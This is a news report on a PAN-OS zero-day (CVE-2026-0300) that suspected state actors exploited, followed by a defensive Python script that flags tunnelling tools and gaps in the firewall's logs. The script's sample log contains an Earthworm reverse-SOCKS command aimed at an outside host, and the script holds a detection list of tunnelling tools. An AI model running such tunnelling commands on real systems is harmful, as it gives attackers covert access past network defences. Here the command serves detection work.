TL;DR
A zero-day vulnerability in Palo Alto Networks PAN-OS firewalls has been exploited by suspected state-sponsored threat actors for nearly a month. The flaw allows unauthenticated remote code execution. Palo Alto Networks is working on patches, and authorities have issued security directives.
Palo Alto Networks has confirmed that a critical zero-day vulnerability in its PAN-OS firewalls has been exploited by suspected state-sponsored hackers for nearly a month, with active attacks confirmed since early April. This security flaw, identified as CVE-2026-0300, allows attackers to execute arbitrary code remotely, posing a significant threat to organizations relying on these firewalls for network security.
The vulnerability resides in the PAN-OS User-ID Authentication Portal, also known as the Captive Portal, and stems from a buffer overflow that enables unauthenticated remote code execution. Palo Alto Networks stated that only limited exploitation was observed initially, but by April 16 attackers had successfully compromised devices and deployed malicious shellcode. After gaining access, the attackers cleaned logs and deleted crash records to evade detection.
After compromise, the threat actors deployed the open-source tools Earthworm and ReverseSocks5, which provide covert tunnelled communication and let the attackers reach the device through NAT and firewall boundaries. Shadowserver has identified over 5,400 exposed PAN-OS VM-Series firewalls worldwide, most of them in Asia and North America. Palo Alto Networks is preparing security patches, expected on May 13, and advises customers to restrict access to the vulnerable portal until then.
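The two post-exploitation traces the report describes, tunnelling tools running on the device and gaps left by log cleaning, are both things a defender can look for in forwarded logs. The script below is an added example, not Palo Alto Networks' detection content and not tied to the real PAN-OS log format: the line layout (`<seq> <timestamp> <process> <message>`), the sample lines, the IP addresses and the assumed process names `ew` and `reversesocks5` are all constructed for illustration. It flags known tunnelling-tool process names and, separately, breaks in log continuity (missing sequence numbers or unusually long silences) that can indicate deleted records.

```python
"""Heuristic checks for the post-compromise activity described in the report.

Example code, constructed for this article; it is not Palo Alto Networks'
detection logic and the log format below is an assumption, not PAN-OS's own.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed line layout: "<seq> <ISO-8601 timestamp> <process> <message>"
LINE_RE = re.compile(r"^(?P<seq>\d+) (?P<ts>\S+) (?P<proc>\S+) (?P<msg>.*)$")

# Process names for the tools named in the report. How they appear on disk
# ("ew" for Earthworm, "reversesocks5") is an assumption; adjust to your telemetry.
TUNNEL_TOOLS = {"ew", "earthworm", "reversesocks5"}

# Constructed sample log: a tunnelling tool starts, then records 104-109
# are missing (sequence gap) and a 40-minute silence follows (time gap).
SAMPLE_LOG = """\
101 2026-04-16T02:00:00 sshd session opened for admin from 198.51.100.7
102 2026-04-16T02:01:10 ew -s rssocks -d 203.0.113.9 -e 8888
103 2026-04-16T02:01:15 kernel tcp connect 203.0.113.9:8888
110 2026-04-16T02:40:00 cron periodic job ran
111 2026-04-16T03:20:00 cron periodic job ran
""".splitlines()


@dataclass
class Finding:
    kind: str    # "tunnel_tool", "seq_gap" or "time_gap"
    seq: int     # sequence number of the record that raised the finding
    detail: str


def parse(line):
    """Return (seq, timestamp, process, message) or None for unparsable lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return int(m["seq"]), datetime.fromisoformat(m["ts"]), m["proc"], m["msg"]


def analyse(lines, max_gap=timedelta(minutes=10)):
    """Scan log lines in order and return a list of Findings.

    A sequence-number jump is reported as seq_gap; if the sequence is intact
    but the time between consecutive records exceeds max_gap, as time_gap.
    """
    findings = []
    prev = None  # (seq, timestamp) of the previous parsed record
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        seq, ts, proc, msg = rec
        if proc.lower() in TUNNEL_TOOLS:
            findings.append(Finding("tunnel_tool", seq, f"{proc} {msg}"))
        if prev is not None:
            prev_seq, prev_ts = prev
            if seq != prev_seq + 1:
                findings.append(Finding("seq_gap", seq,
                                        f"sequence jumped {prev_seq} -> {seq}"))
            elif ts - prev_ts > max_gap:
                findings.append(Finding("time_gap", seq,
                                        f"{ts - prev_ts} of silence before seq {seq}"))
        prev = (seq, ts)
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"[{f.kind}] seq={f.seq}: {f.detail}")
```

Both continuity checks produce false positives on reboots and log rotation, so treat them as triage signals rather than alerts on their own. They only work at all if the records have left the device: an attacker who can clean logs on the firewall can also remove anything that has not yet been forwarded, so ship logs to a collector the firewall cannot delete from and run checks like this there.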
Why It Matters
This development underscores the ongoing risk posed by zero-day vulnerabilities in network edge devices, which are often less protected and less closely monitored than the hosts behind them. Exploitation by suspected state-sponsored actors raises the prospect of cyber-espionage or disruption, especially because firewalls sit at the centre of organizational security. The incident has prompted urgent action from government agencies and private firms to update defenses and limit exposure.
Background
The vulnerability was discovered amid increased targeting of network perimeter devices by threat groups, including those linked to nation-states. Palo Alto Networks issued a security advisory and confirmed that the flaw does not affect other products such as Cloud NGFW or Panorama. The attack pattern involves initial reconnaissance, followed by exploitation, log cleaning, and deployment of tunnelling tools for persistent access. Authorities including CISA have added CVE-2026-0300 to the KEV catalog and mandated that federal agencies secure vulnerable devices by May 9.
“We are aware of limited exploitation of CVE-2026-0300 at this time. We are actively working on patches, which are scheduled for release on May 13.”
— Palo Alto Networks spokesperson
“We have added CVE-2026-0300 to the KEV catalog and ordered federal agencies to secure vulnerable firewalls by May 9.”
— CISA spokesperson
What Remains Unclear
It remains unclear how widespread the exploitation is beyond the confirmed activity linked to specific threat groups, and whether additional vulnerabilities are being exploited in tandem. Details about the full scope of affected organizations and the specific attribution of the attackers are still emerging.
What’s Next
Palo Alto Networks plans to release security patches on May 13, 2026. Organizations are advised to implement interim mitigation measures, such as restricting access to the User-ID Authentication Portal. Further investigations into the scope of the compromise and attribution are expected to continue, alongside efforts to improve detection and response capabilities.
Key Questions
What is CVE-2026-0300?
CVE-2026-0300 is a critical remote code execution vulnerability in Palo Alto Networks PAN-OS firewalls’ User-ID Authentication Portal, caused by a buffer overflow flaw.
Who is exploiting this vulnerability?
Suspected state-sponsored threat groups are exploiting CVE-2026-0300, with activity confirmed since early April 2026.
What should organizations do now?
Organizations should restrict access to the vulnerable portal, monitor for unusual activity on their firewalls, and apply the patches when they become available on May 13, 2026.
Are all Palo Alto firewalls affected?
No, only those running vulnerable versions of PAN-OS with the User-ID Authentication Portal enabled are affected. Other products like Cloud NGFW and Panorama are not impacted.
What tools did attackers deploy after compromising firewalls?
Attackers deployed the open-source tools Earthworm and ReverseSocks5 to establish covert tunnelled communication channels and reach compromised devices through NAT and firewall boundaries.